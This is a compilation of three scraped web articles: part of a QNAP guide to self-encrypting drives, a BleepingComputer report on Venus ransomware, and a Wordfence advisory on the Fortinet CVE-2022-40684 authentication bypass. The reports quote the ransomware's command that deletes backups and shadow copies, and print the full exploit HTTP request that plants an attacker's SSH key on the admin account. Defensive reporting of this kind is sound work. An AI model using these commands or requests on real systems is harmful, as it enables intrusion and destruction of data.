UnlockUnlock a locked SED pool or volume. All volumes/shared folders, LUNs, snapshots, and data in the pool or volume will become accessible.
Disable SED SecurityRemove the encryption password and disable the ability to lock and unlock the pool or volume.
Enable SED SecurityAdd an encryption password and enable the ability to lock and unlock the pool or volume.

Removing a Locked SED Storage Pool or Static Volume

  1. Go to Storage & Snapshots > Storage > Storage/Snapshots.
  2. Select a locked SED storage pool or static volume.Note:Static volumes are only available in QTS.
  3. Click Manage, and then click Remove.The Removal Wizard window opens.
  4. Select a removal option.OptionDescriptionUnlock and remove pool, data, and saved keyThis option unlocks the SED disks in the storage pool or static volume, and then deletes all data. The storage pool or static volume is removed from the system.You must enter the encryption password.Remove pool without unlocking itThis option removes the storage pool or static volume without unlocking the disks. The SED disks cannot be used again until you perform one of the following actions:
    • Unlock the disks. Go to Disks/VJBOD, click Recover, and then select Attach and Recover Storage Pool.
    • Erase the disks using SED erase.
  5. Click Apply.

The system removes the locked SED storage pool or static volume.

Migrating a SED Secure Storage Pool to a New NAS

The following requirements apply when migrating a storage pool to a new NAS.

  • The two NAS devices must both be running QTS, or both be running QuTS hero. Migration between QTS and QuTS hero is not possible.
  • The version of QTS or QuTS hero running on the new NAS must be the same or newer than the version running on the original NAS.
  1. On the original NAS, go to Storage & Snapshots > Storage > Storage/Snapshots.
  2. Select a SED secure storage pool.
  3. Click Manage.The Storage Pool Management window opens.
  4. Click Action, and then select Safely Detach Pool.A confirmation message appears.
  5. Click Yes.The storage pool status changes to Safely Detaching…. After the system has finished detaching the pool, it disappears from Storage & Snapshots.
  6. Remove the drives containing the storage pool from the NAS.
  7. Install the drives in the new NAS.
  8. On the new NAS, go to Storage & Snapshots > Storage > Disks/VJBOD .
  9. Click Recover, and then select Attach and Recover Storage Pool.A confirmation message appears.
  10. Enter the encryption password.You must enter this password if you are using self-encrypted drives (SEDs) with encryption activated.
  11. Click Attach.The system scans the disks and detects the storage pool.
  12. Click Apply.

The storage pool appears in Storage & Snapshots on the new NAS.

Erasing a Disk Using SED Erase

SED Erase erases all of the data on a locked or unlocked SED disk and removes the encryption password.

  1. Go to Storage & Snapshots > Storage > Disks/VJBOD.
  2. Select a SED disk.
  3. Click Actions, and then select SED Erase.The SED Erase window opens.
  4. Enter the disk’s Physical Security ID (PSID).Tip:The PSID can usually be found on the disk label.If you cannot find the PSID, contact the disk manufacturer.
  5. Click Apply.

The system erases all data on the SED.

SED Status

To view the status of a SED, go to Storage & Snapshots > Storage > Disks/VJBOD and click an installed SED.

SED StatusDescription
UninitializedThe SED is uninitialized. Drive encryption is deactivated.
UnlockedThe SED is initialized and unlocked. Drive encryption is activated. Data on the SED is encrypted and accessible.
LockedThe SED is initialized and locked. Drive encryption is activated. Data on the SED is encrypted and inaccessible.
BlockedThe SED is blocked for security reasons. The drive cannot be initialized.Note:To unblock the SED, reinsert the disk or erase the disk using SED Erase. For details, see Erasing a Disk Using SED Erase.

Glossary

GlossDefinition
Auto unlock on startupSetting that allows the system to automatically unlock a SED secure storage pool or SED secure static volume after the NAS restarts
Encryption keyA unique, randomized cryptographic string physically stored within the hardware in self-encrypting drives (SEDs) for encrypting data written to the drive and decrypting data as it is read from the drive
Encryption passwordA user-defined password for locking and unlocking a SED secure storage pool or static volume
PSID (Physical Secure ID)A unique key usually labeled on a self-encrypting drive (SED) for resetting the drive to factory default
SED EraseStorage & Snapshots function for erasing all data on a self-encrypting drive (SED) and removing the encryption password

Source :
https://www.qnap.com/en/how-to/tutorial/article/how-to-use-self-encrypting-drives-seds-on-your-qnap-nas

Venus Ransomware targets publicly exposed Remote Desktop services

Threat actors behind the relatively new Venus Ransomware are hacking into publicly-exposed Remote Desktop services to encrypt Windows devices.

Venus Ransomware appears to have begun operating in the middle of August 2022 and has since encrypted victims worldwide. However, there was another ransomware using the same encrypted file extension since 2021, but it is unclear if they are related.

BleepingComputer first learned of the ransomware from MalwareHunterTeam, who was contacted by security analyst linuxct looking for information on it.

Linuxct told BleepingComputer that the threat actors gained access to a victim’s corporate network through the Windows Remote Desktop protocol.

Another victim in the BleepingComputer forums also reported RDP being used for initial access to their network, even when using a non-standard port number for the service.

How Venus encrypts Windows devices

When executed, the Venus ransomware will attempt to terminate thirty-nine processes associated with database servers and Microsoft Office applications.

taskkill, msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlservr.exe, sqlwriter.exe, oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, mydesktopqos.exe, agntsvc.exe, isqlplussvc.exe, xfssvccon.exe, mydesktopservice.exe, ocautoupds.exe, agntsvc.exe, agntsvc.exe, agntsvc.exe, encsvc.exe, firefoxconfig.exe, tbirdconfig.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, powerpnt.exe, sqlservr.exe, thebat64.exe, thunderbird.exe, winword.exe, wordpad.exe

The ransomware will also delete event logs, Shadow Copy Volumes, and disable Data Execution Prevention using the following command:

wbadmin delete catalog -quiet && vssadmin.exe delete shadows /all /quiet && bcdedit.exe /set {current} nx AlwaysOff && wmic SHADOWCOPY DELETE

When encrypting files, the ransomware will append the .venus extension, as shown below. For example, a file called test.jpg would be encrypted and renamed test.jpg.venus.

Files encrypted by the Venus Ransomware
Files encrypted by the Venus Ransomware
Source: BleepingComputer

In each encrypted file, the ransomware will add a ‘goodgamer’ filemarker and other information to the end of the file. It is unclear what this additional information is at this time.

Goodgamer file marker in an encrypted file
Goodgamer file marker in an encrypted file
Source: BleepingComputer

The ransomware will create an HTA ransom note in the %Temp% folder that will automatically be displayed when the ransomware is finished encrypting the device.

As you can see below, this ransomware calls itself “Venus” and shares a TOX address and email address that can be used to contact the attacker to negotiate a ransom payment. At the end of the ransom note is a base64 encoded blob, which is likely the encrypted decryption key.

Venus Ransomware ransom note
Venus Ransomware ransom note
Source: BleepingComputer
https://6c29118eeb90b493fc8cae82084958c7.safeframe.googlesyndication.com/safeframe/1-0-38/html/container.html?upapi=true

AD

At this time, the Venus ransomware is fairly active, with new submissions uploaded to ID Ransomware daily.

As the ransomware appears to be targeting publicly-exposed Remote Desktop services, even those running on non-standard TCP ports, it is vital to put these services behind a firewall.

Ideally, no Remote Desktop Services should be publicly exposed on the Internet and only be accessible via a VPN

Related Articles:

Magniber ransomware now infects Windows users via JavaScript files

Microsoft: Iranian hackers encrypt Windows systems using BitLocker

Ransom Cartel linked to notorious REvil ransomware operation

REvil ransomware returns: New malware sample confirms gang is back

Windows 10 22H2 is released, here’s what we know

Source :
https://www.bleepingcomputer.com/news/security/venus-ransomware-targets-publicly-exposed-remote-desktop-services/

Threat Advisory: CVE-2022-40684 Fortinet Appliance Auth bypass

This morning, the Wordfence Threat Intelligence team began tracking exploit attempts targeting CVE-2022-40684 on our network of over 4 million protected websites. CVE-2022-40684 is a critical authentication bypass vulnerability in the administrative interface of Fortinet’s FortiGate firewalls, FortiProxy web proxies, and FortiSwitch Manager, and is being actively exploited in the wild¹,².

At the time of publishing, we have recorded several exploit attempts and requests originating from the following IP addresses:

  • 206.189.231.41
  • 172.105.131.156
  • 45.79.174.33
  • 143.110.215.248
  • 159.180.168.61
  • 194.195.241.147
  • 45.79.174.9
  • 45.79.174.160
  • 134.122.38.186
  • 104.244.77.122
  • 45.79.174.212
  • 2.58.82.81
  • 194.163.135.129
  • 173.212.205.42
  • 172.104.6.178
  • 38.242.217.243
  • 194.135.83.48
  • 134.122.44.177
  • 207.180.241.85
  • 75.128.217.136
  • 107.189.4.80

Most of the requests we have observed are GET requests presumably trying to determine whether a Fortinet appliance is in place:

GET /api/v2/cmdb/system/admin/admin HTTP/1.1
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
X-Forwarded-Proto: https
X-Forwarded-Ssl: on
X-Forwarded-For: 75.128.217.136
Host: <redacted>
Content-Type: application/x-www-form-urlencoded

However, we also found that a number of these IPs are also sending out PUT requests matching the recently released proof of concept, referenced at the end of this advisory, which attempts to update the public SSH key of the admin user:

PUT /api/v2/cmdb/system/admin/admin HTTP/1.1
X-Forwarded-For: 172.104.6.178
Accept-Encoding: gzip
Forwarded: for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;
Connection: close
User-Agent: Report Runner
Host: <redacted>
Content-Type: application/json
Content-Length: 610


{
"Ssh-public-key1":"\"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDIOC0lL4quBWMUAM9g/g9TSutzDupGQOnlYqfaNEIZqnSLJ3Mfln6rGSYol/WSm6/N7TNpuVFScRtmdUZ9O8oSamyaizqMG5hcRKRiI49F49judolcffBCTaVpQpxqt+tjcuGzZAoIqg6TyHg1BNoja/IjUQIVbNGyzl+DxmsX3mbmIwmffoyV8l4sEOynYqP3TC2Z8wJWv3WGudHMEDXBiyN3lrIDKlHzROWBkGQOcv3dCoYFTkzdKYPMtnTNdGOOF6wgWB3Y/fHyyWvbN23N2mxsgbRMdKTItJJNLGiJwYBHnC3lp2CQQlrYfsAnBQRu56gp7TPgheP+UYyGlYy4mcnsanGYCS4VozGfWwvhTSGEP5Uws/WxWNFq3Be7c/IWPx5AzvzT3iOq9R704xL1BxW9KAkPmjegav/jOEEh5YX7b+HcErMpTfo5DCi0CZilBUn9q/qM3v4HWKgJObaJnycE/PPyZML0xof29qvbXJDy2efYeCUCfxAIHUcJx58= dev@devs-MacBook-Pro.local\""
}

While some requests are using a fake public key, which may indicate a benign vulnerability scanner, all of the requests using a valid public key are using the same public key, indicating that these requests are all the work of the same actor. An attacker able to update or add a valid public SSH key to a user’s account on a system can then typically gain access to that system as that user if they have the corresponding private key. In this case the attacker is attempting to add their own public key to the admin user’s account.

The SSH key has the following fingerprint: SHA256:GBl4Pytt+W2yEZ3zlOkAZkgtqmTPBcEZlqK4hoNOqBU dev@devs-MacBook-Pro.local (RSA)

All of the PUT exploit attempts we have seen are using the “Report Runner” User-Agent as this is a requirement of the exploit, though the exploit may also be viable with the User-Agent set to “Node.js”.

New IP Addresses attacking CVE-2022-40684 will appear on the Wordfence Intelligence IP Threat Feed in the “auth_bypass” category as the feed is updated every 60 minutes.

1. Fortinet released an advisory with additional information, including affected products and workarounds for users unable to patch.
2. Horizon3.ai initially discovered that the vulnerability was being exploited in the wild and released a proof of concept earlier today.

Source :
https://www.wordfence.com/blog/2022/10/threat-advisory-cve-2022-40684-fortinet-appliance-auth-bypass/